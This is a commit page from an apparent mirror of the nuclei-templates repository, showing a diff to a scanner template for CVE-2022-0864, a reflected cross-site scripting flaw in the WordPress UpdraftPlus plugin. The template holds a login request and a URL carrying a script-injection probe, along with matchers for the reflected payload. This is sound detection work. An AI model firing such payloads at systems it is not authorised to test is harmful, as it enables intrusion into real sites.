daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #8634 from projectdiscovery/CVE-2022-0864 

Update FN CVE-2022-0864.yaml
patch-1
Dhiyaneshwaran 2023-11-18 18:12:28 +05:30 committed by GitHub
parent dfb8f25d2e 04abd00e03
commit 114e799792
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 6 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
http/cves/2022/CVE-2022-0864.yaml
View File

@ -21,8 +21,8 @@ info:
epss-percentile: 0.62009 epss-percentile: 0.62009
cpe: cpe:2.3:a:updraftplus:updraftplus:*:*:*:*:*:wordpress:*:* cpe: cpe:2.3:a:updraftplus:updraftplus:*:*:*:*:*:wordpress:*:*
metadata: metadata:
verified: true
max-request: 2 max-request: 2
verified: true
vendor: 'updraftplus' vendor: 'updraftplus'
product: 'updraftplus' product: 'updraftplus'
framework: wordpress framework: wordpress
@ -37,19 +37,19 @@ http:
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- | - |
GET /wp-admin/options-general.php?page=updraftplus&updraft_interval"></script><script>confirm(document.domain)</script> HTTP/1.1 GET /wp-admin/options-general.php?page=updraftplus&updraft_interval"></script><script>confirm('document_domain')</script> HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
cookie-reuse: true cookie-reuse: true
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
part: body part: body_2
words: words:
- '</script><script>confirm(document.domain)</script>' - "<script>confirm('document_domain')</script>"
- 'updraftplus' - "Existing backups"
condition: and condition: and
- type: word - type: word